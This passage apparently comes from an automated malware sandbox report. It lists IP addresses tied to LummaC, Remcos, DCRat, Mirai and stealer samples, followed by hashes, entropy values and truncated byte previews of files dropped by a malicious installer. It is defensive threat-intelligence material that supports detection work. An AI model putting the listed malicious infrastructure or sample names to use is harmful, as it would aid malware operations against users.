                                                                                    • 104.18.18.106
                                                                                    E6wUHnV51P.exeGet hashmaliciousDCRatBrowse
                                                                                    • 104.21.12.142
                                                                                    gem2.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.64.1
                                                                                    gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                    • 104.26.12.205
                                                                                    176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                    • 172.67.160.193
                                                                                    https://accountsupporthub.es/generate/Login/Get hashmaliciousUnknownBrowse
                                                                                    • 104.21.90.106
                                                                                    Solara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                                                                                    • 162.159.134.233
                                                                                    resembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                    • 162.159.135.232
                                                                                    NTLGBres.x86.elfGet hashmaliciousUnknownBrowse
                                                                                    • 86.33.7.202
                                                                                    5.elfGet hashmaliciousUnknownBrowse
                                                                                    • 82.30.244.131
                                                                                    6.elfGet hashmaliciousUnknownBrowse
                                                                                    • 86.6.255.118
                                                                                    4.elfGet hashmaliciousUnknownBrowse
                                                                                    • 92.237.232.117
                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 185.161.251.21
                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 185.161.251.21
                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 185.161.251.21
                                                                                    Full-Ver_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 185.161.251.21
                                                                                    https://patiooutletmaipu.cl/tiendas/head/Get hashmaliciousLummaC, CAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                                    • 185.161.251.21
                                                                                    frosty.arm.elfGet hashmaliciousMiraiBrowse
                                                                                    • 212.250.45.83
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    a0e9f5d64349fb13191bc781f81f42e1Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.16.1
                                                                                    • 185.161.251.21
                                                                                    176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                    • 104.21.16.1
                                                                                    • 185.161.251.21
                                                                                    Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.16.1
                                                                                    • 185.161.251.21
                                                                                    x.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.16.1
                                                                                    • 185.161.251.21
                                                                                    SDIO_R773.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.16.1
                                                                                    • 185.161.251.21
                                                                                    176.113.115.170_3.ps1Get hashmaliciousLummaCBrowse
                                                                                    • 104.21.16.1
                                                                                    • 185.161.251.21
                                                                                    4kN17cL4Tn.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.16.1
                                                                                    • 185.161.251.21
                                                                                    5tmmrpv3dn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.16.1
                                                                                    • 185.161.251.21
                                                                                    b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.16.1
                                                                                    • 185.161.251.21
                                                                                    Q7QR4k52HL.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.16.1
                                                                                    • 185.161.251.21
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    C:\Users\user\AppData\Local\Temp\224553\Luther.comc.htaGet hashmaliciousRemcosBrowse
                                                                                      c2.htaGet hashmaliciousRemcosBrowse
                                                                                        c2.htaGet hashmaliciousRemcosBrowse
                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                Full-Ver_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                    HouseholdsClicking.exeGet hashmaliciousLummaCBrowse
                                                                                                      DodSussex.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:modified
                                                                                                        Size (bytes):947288
                                                                                                        Entropy (8bit):6.630612696399572
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                        MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                        SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                        SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                        SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: c.hta, Detection: malicious, Browse
                                                                                                        • Filename: c2.hta, Detection: malicious, Browse
                                                                                                        • Filename: c2.hta, Detection: malicious, Browse
                                                                                                        • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                        • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                        • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                        • Filename: Full-Ver_Setup.exe, Detection: malicious, Browse
                                                                                                        • Filename: random.exe, Detection: malicious, Browse
                                                                                                        • Filename: HouseholdsClicking.exe, Detection: malicious, Browse
                                                                                                        • Filename: DodSussex.exe, Detection: malicious, Browse
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):485854
                                                                                                        Entropy (8bit):7.999573394829961
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:12288:SIue0YbJwVAHBqUzXzA767Tzv9SMFHUUHPyhbRCL:SIx0gCAhqozC67TzFSQFvyhM
                                                                                                        MD5:33F702C6F174718D817B4605ED89B52F
                                                                                                        SHA1:F5649E94BFA880C7AA8D2EBCC27CBBCF44901223
                                                                                                        SHA-256:1021AFDCAC174AC0BFEB373B28C4658B5DC7671FCD2F7301EDB10746EAF4F333
                                                                                                        SHA-512:D6DABDACB753C46BB6D9043DF7F02676F8EC5221742B5E861E62436BECE904F92214498C5E3EECB0974CB47229A7356101C936B0ACC26EDC907D150EFB01D1E5
                                                                                                        Malicious:false
                                                                                                        Preview:.Q...2.^.t...............g.6...N.h..,.{....[....X.......8P}K...T.S....+..B(|.B....4.|..h..*E...5.....k....@^...._......n......kpeG.....@]9../..[....U..#..W'./...X|r.Y...:7........_...N.5ro$.6q.g|.B.R..|X...Q!f%%of...RP.S4....|.m);G.7CkTs.s#.P.......h9...z)ia]]:..*.r7".M.^.o...H.q....U.8.B......Y.!;..6x...U..fU.o.;6(...Ypb....n....].j/.'AI.2..'*P.#..h....;.M.!..c..a-.>.F.V&......f0Y.........&Z1...#..R.;g2G.t..x.Q.fFf...S...9....b.{...q...B....'..a..b...lg......"......!jO...~0t .r.+....$+y%..f8.^3$......w.....7..i.Z. ......S...8..O:..F.'>.zwA..9..i-[.)....Cwt.........}.f.....M...&L..b..b...x....x.Z.1Ipl.....)i...Wo.&.Y..{......4m.D....jE..@.r.E>..g&.?.U....a...*.|....b..|{..D.B.I....Z.x.......a.......uR........o.$F.d.B.s...%_..V..Z4(....*...q...,f..P..=M.uBK.V.H....B."I.*t).nDTa....P..C..f.......*......`W..]0..D^.>..:....at2...I)...9.v<p/.\5...]..&y.....e-.{.....Qh.<)E.o..f..[.g..9...[[...R.N7.a..L.4&v.\W@..Ce;2...5sy..6..p.8.*.ff.........t`.N.u
                                                                                                        Process:C:\Users\user\Desktop\installer_1.05_37.4.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):53248
                                                                                                        Entropy (8bit):7.996051998557532
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:768:CiLf0dEns7XSCAOROOzsycJSpAysuRQMDBgY+v8tj3nk1gGM1KyJMIwFKzx9kKcw:BLIExCPOOYyaSpr+aNZnke3J/zxel7G
                                                                                                        MD5:AF3FF719C0EDACF7C2AC90C6259B85C4
                                                                                                        SHA1:3DF4EFC47089E1DCC211BF19459C228FC36ABF74
                                                                                                        SHA-256:97AE833CC88A6444656556032AD9D2EC0351233B41C5EC74A2D49341EEFFA1B6
                                                                                                        SHA-512:2368493619E85C862997179945CECFCB4F824BA85B5B7E3B7278B6974EDACFE9A95960BAB8F436EA6E380965B3EE1BE6C6FC3B274B42BED7200726FCF5D593D8
                                                                                                        Malicious:false
                                                                                                        Preview:.J].?.....p0I.:..[C....T.......`...r...".....w.).-\U:....8n.`...edN..HG.... ..YY....a.@o...u. ...wErW.L.U...h..}...2...9c..sB.m..m..9.....vn....%.@,pc.Ch...7.tgC5e........HP.x.r(.l....g......?......#.Y!.A'}......,...8...2y..U.8..<.S)O.;...h.W.x]^*...9.....1T....4Ijc..pc..f..^A.p.C.(......8.^A......t.$1...f...&.....XF..,..".._.\....d.Y?.y..w3..z....A..... .......&DVa.6.h..rv^..!A....u..../..fo.\..C....0....[..._u..Z..Y...9&yP...I.Ij.o.<,'6;%..sP......C.!.oCt.....huW4x.P>...`N.Xv.....9/....)w.~.Y_h.d.B!.8je..\V..t!...6.0Ue..ZZ..J%qF..n.7FI.{..Qp.3........M?{.VFbG........T..{e....'.VS$.N...{..r...T....l.BA...VQ.1.Q]Y..r..5.3.O.@.ftT..!.R...$b..O~....mr...@A@=..z......8db|.p).yt*..+.E:|.2v>(.."..c...\p..J.4..vN......O.Cn...t.....9..O1|.....r!....B\...Q.%oY.\4..nF..U.:..s.z~......U.a .../.F.+.+..k7.,.t.%y.U!.e...e.......A.T.I.ibq.,....#...^......D....S.yi.>...qy...J;.^s...b<;.7.#..1;..Z..YA.....$UD..}..'.....E.|.j4.....&o.i...u&.p..'....0$
                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):90112
                                                                                                        Entropy (8bit):6.68731712000028
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:EIwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+Sh+I+FrbCyIi:GcBiqXvpgF4qv+32eOyKODOSpQSAB
                                                                                                        MD5:5FA589CA1812F594C0773AEA5ADAA1AF
                                                                                                        SHA1:D7E9B77324D0DA50B2D3B253FE57ADA8100E2DD9
                                                                                                        SHA-256:43F6FA8CD5131CDB725AE40BC9643A0126C9FF356333D757E6AB105E1274CFB2
                                                                                                        SHA-512:490A3DAB1F7A50E7DA3DCEA5BB39AF7CED6326CAEE9D332F12B4F0DED6A235E612C53AB3FA2A7695C83630C5F8252A3E86140F3C6DEDDDB7912E228DABC9735D
                                                                                                        Malicious:false
                                                                                                        Preview:........t...uE.E......<.......}...xt...Xt...u..E.....P.M..v....}.....u..U...7....}....3..u...j0Xf;...U...j:Xf;.s.....0.=........f;........`...f;...&......f;.s....-`.............f;..........f;.s....-..........f...f;..........f;.s....-f.............f;..........f;.s....-.........f...f;..........f;.s....-f............f;...w......f;.s....-.....]....f...f;...T......f;.s....-f....:....f...f;...1......f;.s....-f.............f;..........f;.s....-..........f...f;..........f;.s....-f.........P...f;..........f;.s....-P............f;..........f;.s....-......... ...f;..........f;.s....- ....k.@...f;.rf...f;.s....-@....O.....f;.rJ...f;.s....-.....3.....f;.r....f;.s&...-...........f;.s....-............u0jAXf;.w.jZXf;.v..F.f;E.w..F.f;E....w... ...........t1;E.s,.u....;.r.u.;.v........u....u...7....}..9...V.M........u..E.3.E..A.u.VS....YY..t(......."......u.........t..................t....}..^..e....E.P.....V.....U...8.M.SVW.6.....t#.].j._..t6;.|...$~-.............3.....u...t..M......_
                                                                                                        Process:C:\Users\user\Desktop\installer_1.05_37.4.exe
                                                                                                        File Type:Microsoft Cabinet archive data, 488637 bytes, 10 files, at 0x2c +A "Departure" +A "Webshots", ID 7136, number 1, 29 datablocks, 0x1 compression
                                                                                                        Category:dropped
                                                                                                        Size (bytes):488637
                                                                                                        Entropy (8bit):7.998553093427413
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:12288:ahh/9BtROsl7lHOMO5nQZ162gpIjfscznOJhXZg/Klkw:MhXtnl7luC62gKjk+YU/Kl5
                                                                                                        MD5:72C5F20B52AECA0923566A34B9133CF2
                                                                                                        SHA1:7832A2B158078E5BF463F54E54D6538FB340B6F0
                                                                                                        SHA-256:87AA8213C3409DE46457A2FDBB278FF529CAAC10391F36687617FA149406B5EA
                                                                                                        SHA-512:2F0F8231C1A90D91DB5701EBC57941B673F036B859607B22815E372613A348E1C3EA46EC10F785F77F091612C987DD3A6CB7BA6F2B922C640CB4D099D1510455
                                                                                                        Malicious:false
                                                                                                        Preview:MSCF.....t......,.....................................,Z.I .Departure.o ........,Z.I .Webshots..@.._$....,Z.I .Remote....._d....,Z.I .Holocaust....._t....,Z.I .Rating..`.._.....,Z.I .Cho..8.._.....,Z.I .Page....._$....,Z.I .Priorities....._0....,Z.I .Reliability..L.._(....,Z.I .Dot.wd..\I..CK..\.Y.... AP.D.....JV@P.P.@..%IF. A.$...d..!.....H.$.9.(.........{.{.......:.._Ug~}M_....#1......l..h.(.>.$.?.Pc...c...C.x..C.....&Kk.Ck]3......6Lz.L..L..LR.JLf...9....}.#.&Mx6.i...y...R>#...w.5......5W.W.o.?.U.`:6 i4..*....UaT..4...d\...U.s{..^=...F.{.+.._3.....)J.....@..V..A..q... .G..e.{.&.1.. x.B.y.k.......k.d.....).X.....%{...D.3TT..0...<......$.... ...t..M.$.@...>.n.A>...|N9m..l..$..3CP_......:..tmt...6...i..w..v%8?g..,....@.....|HN.;.7...}.........7..3B}...p............O..m.R.L...e.5(..7..+...o.......~....<du-.Qv..D..BX;..;."....ns....[..\5..<..M...N$O..6o.m. ..G.|e.......k..4.^..y....a......>y[.,...+..o.'O.H....j%).,.l..w.{G..$3`...&|x..'N...v.|......
                                                                                                        Process:C:\Users\user\Desktop\installer_1.05_37.4.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):96256
                                                                                                        Entropy (8bit):7.9978628045379745
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:1536:oRHUXB8kuuEMOjWUqTAlyY9ILFz8/7YAuPQOiN/gi1aowi+QB9RCIcl55G0I7TsA:oRIuuBOjWUIAMGIxojYBPsoQ3b03Gb39
                                                                                                        MD5:E6391427848508DC0AC92258CC6FD6AF
                                                                                                        SHA1:6722E7BCF38C1C2013499F725850ABCBCDC06007
                                                                                                        SHA-256:65E9E6BFCCD8AB7ACAC8E56E74410059512477C47DFF1ACBCABA22F3611EBD06
                                                                                                        SHA-512:0FF1ED8D2F55169991C20F9884E97D73D91B24639C0E1813D4F2C5C1231904F5D829A567A2BC88A869FB9F544B16844F439947CBAD5573B28E3E30662CC93260
                                                                                                        Malicious:false
                                                                                                        Preview:.Q...2.^.t...............g.6...N.h..,.{....[....X.......8P}K...T.S....+..B(|.B....4.|..h..*E...5.....k....@^...._......n......kpeG.....@]9../..[....U..#..W'./...X|r.Y...:7........_...N.5ro$.6q.g|.B.R..|X...Q!f%%of...RP.S4....|.m);G.7CkTs.s#.P.......h9...z)ia]]:..*.r7".M.^.o...H.q....U.8.B......Y.!;..6x...U..fU.o.;6(...Ypb....n....].j/.'AI.2..'*P.#..h....;.M.!..c..a-.>.F.V&......f0Y.........&Z1...#..R.;g2G.t..x.Q.fFf...S...9....b.{...q...B....'..a..b...lg......"......!jO...~0t .r.+....$+y%..f8.^3$......w.....7..i.Z. ......S...8..O:..F.'>.zwA..9..i-[.)....Cwt.........}.f.....M...&L..b..b...x....x.Z.1Ipl.....)i...Wo.&.Y..{......4m.D....jE..@.r.E>..g&.?.U....a...*.|....b..|{..D.B.I....Z.x.......a.......uR........o.$F.d.B.s...%_..V..Z4(....*...q...,f..P..=M.uBK.V.H....B."I.*t).nDTa....P..C..f.......*......`W..]0..D^.>..:....at2...I)...9.v<p/.\5...]..&y.....e-.{.....Qh.<)E.o..f..[.g..9...[[...R.N7.a..L.4&v.\W@..Ce;2...5sy..6..p.8.*.ff.........t`.N.u
                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1008
                                                                                                        Entropy (8bit):3.2336484110690926
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:YyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1:YyGS9PvCA433C+sCNC1
                                                                                                        MD5:F5189566C9C39E1C2D0D72E8C10B8B79
                                                                                                        SHA1:C59598A96AA3B5939D663FD80FBD591EE3291929
                                                                                                        SHA-256:1ABE59BF2ECCF033889F006F7E47709EC38D5E36E795DC959E68AD60A1C1425A
                                                                                                        SHA-512:353580A4B7D04D7FC6AAF5DF3CB9D84AAF39264E371263F1FAC6E1680A863BC42757658171C36FD84E19EB555F2EAFF1596511E0AF1DC62D1DE7358FC793BEFB
                                                                                                        Malicious:false
                                                                                                        Preview:Readily........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):84992
                                                                                                        Entropy (8bit):6.575192846373192
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:l+pqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+r5bL5:cAqVnBypIbv18mLthfhnueoMmOqDoiok
                                                                                                        MD5:BC5A5C27BBDA4F3EE9D4DF841EE733B1
                                                                                                        SHA1:F5B47462614D2BA38709DC5E59860B2DFFB4535A
                                                                                                        SHA-256:F232B85DBCFA04E0BF3881A1693F6D5A79031CDE17C56CB819C94B844D61E8B9
                                                                                                        SHA-512:AD399CAB38073200FA32B809EB25D7BF7576FFC23275ADE88F4B72DCA544F87E72EF02F24E608F51263154386E38C6CE48DE9693332A61E02A030B8D7E667AAD
                                                                                                        Malicious:false
                                                                                                        Preview:..t.P....I.2.....S.u.h.....w`P....I.....u#.F.......0.I..F.........tVP....I..M.E.PW....I..U.3.....N..V.8].t...W8^0t..................^.........t.P....I.....t.W....I..._[^]...U...$SV..3.WS.FT%....PSS.v .v.....I.....u..F.)........u...W.l...SSSSW....I...twW....=....uj.E..].P.E..E. ...P.E.Pj.W....I.3.f.E..E.P.G...Y.F..V.8].t...W8^0t.."......E......9.^.........t.P....I....!.F.*.....0.I..F.........t.P....I...t.W....I._^..[....U..U...D.....3.]...U...|SV..M.W.....E.P.v .q.....u..F......;.}.j.[;.t....t..F......#W...n.....u..^......tHO...t%.F.......0.I..F.........t.P....I.2..=.u..FXP..........P.E.P.r......u.......P..........P.E.P.......M....._^..[....U.....e...E..e..P.E..E.....P.E.Ph... .u.....I...t..E..........U...$SVW.}....t..FT.E.u.......E...Gx3.SS.wp.w0.w P.w..v.....I.....u(.F.......0.I..F.........t.P....I.2......S.u.SSS.w`SP....I.....u..F..........8].t..u...W......E.....t..E..E.....P.E.Pj.W....I..M......E.j.Pj.W....I.SSSSW....I...twW.....=....uj.E..].P.E..E. ...P.E.Pj.W....I.3.
                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):135168
                                                                                                        Entropy (8bit):6.216478847515094
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:EzW9FfTut/Dde6u640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbjaAtr:EzWWt/Dd314V14ZgP0JaAOz04phdV
                                                                                                        MD5:7EBB69FB1E465B4D1C8E467AB5E583E0
                                                                                                        SHA1:27DED234EC9E48F32738F6DCC15E2A34FB34455E
                                                                                                        SHA-256:82653165CC91BC33C0120101DC443294CBCDCDF02D19111EF906E5F00EFAD565
                                                                                                        SHA-512:C85781A91B3CD7EF626350BF50618043896FCEC372624CCB900E9500B56DCD80DEABD6A3A8B81BAD558AB7CE5E3C87FD51F790893A63CD20CA8B153299B899A6
                                                                                                        Malicious:false
                                                                                                        Preview:.t..G..p.....v..S.|....u........F.........t$...u)...H..D1.8\1.t..@8.@......D1.8\1.t..@8.X..L$@.R....L$ .A....L$0.8..._^3.[..]...U..U.V........J.....,....teR.......j....7......By*...Q..|2...L2.t..I8..A..|2...D2.t..@8.@...u.........&..F.....................3.^]...U......DS.].V...D$...I.3.C.AW.D$.3..L$<...L$,.L$0h.L..D$4.D$<.D$..D$..D$ .D$$.D$,.R...M.h..I..R..h..I..L$$.R...C..L$..0.`...|$...L$.r..C..p....D$ P.l`...D$0P.L$..^`...D$...P.k.....u....H..|1...D1.t..@8.@......|1...D1.t..@8.@...w.|$..u..C..H.....x..L$@.u..........D$@PW.I.....t..M..D$@P..`...,...H..|1...D1.t..@8.@......|1...D1.t..@8.@...L$@.A....L$ .@....L$..D$...I...^...t$......Y.L$0....._^3.[..]...U.........S.].3.VW...D$(.s..t$ .D$,.D$$.D$..D$0.D$....r'.C.j).H..L$H......u...s...L$D.A....D$(...r..C.j).H......u.....D$,...rV.K.j).I......uE.c....K..D$..I..T....K.....D$$.I..B....K......D$..I../......%.....D$0.|$...D$X0....D$\....t..D$\.....C..d$`..d$x..d$d..0....s...F....D$|3..D$t.D$p.D$l.D$h.D$.P....I..D$...D
                                                                                                        Process:C:\Users\user\Desktop\installer_1.05_37.4.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):55296
                                                                                                        Entropy (8bit):7.996386526816881
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:1536:pMEoZw1DXfiMSvw4q1g6Sra+oUuiw1//uoKXQyQw:pMw1DKMuq1LU8KXL
                                                                                                        MD5:4CFE724FA55D354C9807368C7D6EEF37
                                                                                                        SHA1:6B7B271980FDA4C942290A4E58625A4173C2719D
                                                                                                        SHA-256:CB198967C45747C5E6A2FD5C92FF5B13E4C10D4F7DC443B394601C8DB65B8B71
                                                                                                        SHA-512:71DAF1FB12364CC73D73B44EF5B63D7AC749FD2EACC36C53D3F47A4E7BCFCCEACB50D85DB14E67FBA403E97F922BC43F03E1817C4FCA00F945CF36C667F19892
                                                                                                        Malicious:false
                                                                                                        Preview:6.m..z'...#..>...d>@b...U)...C. ....U.....5,..s...a....O..+..h.C..a(.....C..b......o._.#.....$....o..u..~..g..A..._9....v:..d.f...v..".4H.v.,i..*(j.(H.g.3CPA....{r5n).Qoj..Y.....89..t!....v2.n=../...k.x.....KyG..>~...{..f.ol..6 .%q...P......5....q.^......J..."1..Ag3r@.y.h...r.O..7YY.x......p"...............h..Gm.P..W.s!.{|....Z.|.\....IL....O....Jgg.J.a).p..T...z..\........D..n3....W...U8..@.q8.2...D.V.-`..%Zr.......EM....G...XK'.I....@.8.]KN....q..I.1..e'./s.QF..LMBo@.....+D.y.!.H....')6.....pG.lud.......IM..%.%.@=e.:..M...{OJ.N1.Z$|.zvZi.8....y.}~.>:. N.S.}......H..h.7G.q......P........\..[S......e.]_!p....M.s..y.NX.O....lZ4..c.&}./VM...}QG.B.c.]|..U...+.......MIR.9#.o-.Q.........d@Df.r.xQ..m/.......eZ..-....wh.>.B..bC.-J.}....K...X.q.bmg.L."...|...,yP*..or...A...|.y..r..._Qw.mQ*.^...7.p...:...p ,....M.p.%.......ijGRO....;...kH..j..!M!......].E...E..^..t.l....,,..M.9.....X..[...".B?.5..K_...@.;...V.V...7+.M.'.y.=..7...j.>C.h.q6..UIm.Y....B.!
                                                                                                        Process:C:\Users\user\Desktop\installer_1.05_37.4.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):41438
                                                                                                        Entropy (8bit):7.995770146359073
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:768:Cn0UkXryJTmBLd5PyA7WxKGl0vV6Uat9ZvF5HBQ1e9rNr/Z27MPUbjDG6y70ESH5:EqXryJTmBp5PBLvlabn1BQENu7Mcbdye
                                                                                                        MD5:3510BF64CFA6DF3631D880DB920B568F
                                                                                                        SHA1:397BB3156970D85919C7EEA0559FCF55C4F42046
                                                                                                        SHA-256:D6B86D8D46D73F3DF05A804615985008646DD078ECC4BB753B34C0026CAB4473
                                                                                                        SHA-512:EB2826FC3036CF81B2517389BAFC6960700A8C5AA5D0F6F6532E20CA983D3B621F96B479DD5EF6FE12FC78B895E2F862A2704F1514D88913C70D6A483F7A6B55
                                                                                                        Malicious:false
                                                                                                        Preview:(:x......$%..gKN.........y.1..*......k.=..*....k...A..g.-...:....~k.......x.f...._.l..{.%...aK]..z{...~.8.X....!.O6&.*..70.(.}Ps..i.O..{..H^f.....I..{...f7..f...( ...u...&=.,q.}.J!Zu/ffrF.}.'.{z.Z.Dz..5........06BZU.]..-....#Q..3K./."...7_.".........g..7.._.B..W_.KO ..L..;...Y..Z]..|qz......`...K...L....;..>\s..J.d^.....p...7...{-.VEr....)Wv..l7.8W4........u..0Q.....:W}....N..#7.....H^..WtvT..^...0.Q3..k.".....Z.`.S.d..QE1.6...c.M%2.(..,VsWN..+.a. p;.Xp.K..B.?Z..2...p..$%.....L9...>h.G>.6..IQ.G.oy9..............^I.:...d&.z../..54.......y...`.U..c............M..z..Q+.p...4..+....r\:..aV..:7/.\.(Np.\r..O..@6a..x.........]..-X...z ...ScF|...M.^......9)..q..+..1._}....s..i...HH...+0...u..a..BBD+.Rc8.~..._^H.H].f.AE....L.D......:...]k.-.....h.{...O..5.Z.I.F5SF.....&b,....R/M..W.-Ly.'.x.)..&..CtnL...].*...h.B.H....L.0w>&&...J.-{F...F...e1R'Y...p...R...2.6..?..C....C.A.]....=h.x..B....d' ......."..*..Ho...}......Xx..._=/\e....wz.Eu.6.Lg..N...8).=...W>=.g
                                                                                                        Process:C:\Users\user\Desktop\installer_1.05_37.4.exe
                                                                                                        File Type:DOS executable (COM)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):81920
                                                                                                        Entropy (8bit):7.997656375487335
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:1536:wyZwGpggpUA1kDahFLd1RfTv1gVf7mah0WDyYitGdhBV9q0nqMoZ/p:wybpSsrd1NTv1kC8ZDyLAd/zqMc
                                                                                                        MD5:EDAD8BA829CE461DF73B1C45419D06F7
                                                                                                        SHA1:E5B34951D4BB4AD311413B0CF6075D6C70AE1D61
                                                                                                        SHA-256:2E5FFE7355A711DED6E0A037F2FD1EEC67DD52D48A83117E7C35827C2C7AF2C0
                                                                                                        SHA-512:1D9F069336F56434C9343F1A54D0391F5D8B273AC22A0C5713FF8645A8A828EB5B56B3D0B1A10DA9F1E394527B421DF31171691C57FC893F5649CFE5FF040E35
                                                                                                        Malicious:false
                                                                                                        Preview:...eCS..(..5...\...-R..KS.N..SF5:.{..YC....c......k...D.)x...L.h.W...&.+g.q.&u..c6R.gQ.:V$.......2..s...c....+|.uG.i.WS..E9aO:....*..+....9.sN...........o..`1.N;....1...d//Q.....>C.....[.....d<pK.G........p.K.O...l..]....T..]. ....^..'n..#.%E..F..F.Bu.;Z{d.Vi.{.H.......T...I.m.....{C...`.5=.......#....V.87r.~....Wp...."...m..a...t..V`u.f...u0.m..8........h......\..h...CY .....+.[q)=.\.X%..T..z.../.m.........`..1{..S.A...e..E*X6}|.7E.......aX....]..4s.U..U(.Q.4.b/.1..r...?..$...R"8....qa...Nk.U)......._#;....Sv\.)EQF.}u..n....B.kz..h.M.(4...b.K...?.9^...fU.....tDS. .'....v.......t.K.g..wX...^.1.._...m...d..../wX.'...'.....H.*&.V..]B<.d.y.Z...-Q....2..s..5f.......8.|.......c"..).....K~..(R.. .tZ......V...`r.....c2n..H..gu.....w".>T.e&..7E...|\.wC....3....0....z..]......rI.f...!...*.3.]#...u.......E.5.]..P....P..lY..r.O..ph.g..d.NzQ3OG....O.y.....-Sk.tA?......%.v..!..&kj.~."..@l... .`..".h.0.y..nTl..T.I.|S......'L...J..'..y.d..Sl.O....R#
                                                                                                        Process:C:\Users\user\Desktop\installer_1.05_37.4.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):92160
                                                                                                        Entropy (8bit):7.998241493819848
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:1536:nJdfp3DbiNyVXvGbm/OYeudJb4rQnTUP30quGsH/DUy6SmwXIk39lRyHmL:JDfvGbmxjdJ7TUPBsfD0w4kjRyO
                                                                                                        MD5:D6BDAAE9E013495C5FB5E97F1203009A
